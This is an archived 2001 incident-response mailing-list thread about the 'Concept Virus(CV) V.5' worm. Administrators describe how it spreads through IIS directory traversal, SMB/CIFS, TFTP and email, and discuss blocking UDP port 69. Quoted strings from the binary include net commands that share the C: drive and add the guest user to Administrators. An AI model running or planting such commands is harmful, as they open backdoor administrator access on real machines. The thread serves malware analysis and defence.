Have you indeed confirmed that the worm utilizes port 69? If so, how was this confirmed and will you please share the criteria and results of your confirmational testing? Thanks, Robert J. Nieuwhof, CNA, MCP mailto:Rnieuwhofat_private Network Engineer NOS Communications - Information Services http://www.nos.com Madness takes its toll. Please have exact change. The information contained in this correspondence is confidential and intended for the use of the individual or entity named above. Unauthorized distribution is prohibited. Any and all opinions expressed, are the opinions of the author of this e-mail, and in no way reflect or imply the opinions of NOS Communications. -----Original Message----- From: Dave Sill [mailto:davidsat_private] Sent: Tuesday, September 18, 2001 11:13 AM To: Grady Fox Cc: incidentsat_private Subject: Re: Concept Virus(CV) V.5 - Advisory and Quick analysis We've blocked 69/udp at our internal and border routers both incoming and outgoing. Be careful with your private networks. Our tech support department contracted this bug by opening a web page of an infected customer in response to a complaint about performance. Dave Sill Server Admin Socket Internet Services davidsat_private On Tuesday 18 September 2001 15:10, you wrote: > YES > > --- Dave Sill <davidsat_private> wrote: > > You say that the worm gets a payload by tftp... Is > > it using port 69? > > > > Thanks, > > > > Dave Sill > > Server Admin > > Socket Internet Services > > davidsat_private > > > > Is the worm > > > > On Tuesday 18 September 2001 10:47, you wrote: > > > Hi all! > > > > > > > > > We've all just been hit by a VERY aggressive > > > > worm/virus. > > > > > Quick analysis indicates that it propagates itself > > > > in > > > > > a number of different ways: > > > > > > Through use of IIS UNICODE direcory traversal > > > > coupled > > > > > with the recent IIS .dll privilege escalation > > > > attack. > > > > > It uses SMB/CIFS and TFTP to get the worm payload. > > > > > > Through MAPI mails (probably to all of > > > > addressbook). > > > > > Other ways of spreading may be possible, but we > > > > haven't > > > > > yet had the time to properly analyse the > > > > worm/virus. > > > > > It seems to share "c:\" via SMB/CIFS as "c$" and > > > the worm/virus also adds the "Guest" user and > > > > "Guests" > > > > > group to the local "Administrators" group.... > > > > > > > > > Interesting strings in binary: > > > > > > Concept Virus(CV) V.5, Copyright(C)2001 R.P.China > > SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security > > > > share c$=c:\ > > > user guest "" > > > localgroup Administrators guest /add > > > localgroup Guests guest /add > > > user guest /active > > > open > > > user guest /add > > > net > > > > > > > > > More info as we come upon it..... > > > > > > /olle > > --------------------------------------------------------------------------- > > > >- This list is provided by the SecurityFocus ARIS > > > > analyzer service. > > > > > For more information on this free incident > > > > handling, management > > > > > and tracking system please see: > > > > http://aris.securityfocus.com > > --------------------------------------------------------------------------- >- > > > This list is provided by the SecurityFocus ARIS > > analyzer service. > > For more information on this free incident handling, > > management > > and tracking system please see: > > http://aris.securityfocus.com > > __________________________________________________ > Terrorist Attacks on U.S. - How can you help? > Donate cash, emergency relief information > http://dailynews.yahoo.com/fc/US/Emergency_Information/ ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com [INFO] -- Virus Manager: This email message and any attachments have been scanned for viruses and are believed to be free of any virus. This email, including any attached files, is confidential and is for the sole use of the individual or entity for whom it is intended. This email represents the originator’s personal views and opinions, which do not necessarily reflect those of this Company. If you are not the intended recipient of this email, be advised that you have received this email in error. Any use, dissemination, forwarding, printing, or copying of this email is strictly prohibited and may be subject to legal sanction. If you have received this email in error, please immediately notify postmasterat_private . This email and any attachments have been scanned for viruses and are believed to be free of any virus or defect that might affect any computer system into which it is received. However, it is the responsibility of the recipient to ensure that it is virus free and no responsibility or liability is accepted by this Company for loss or damage arising from its use. ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 17:00:23 PDT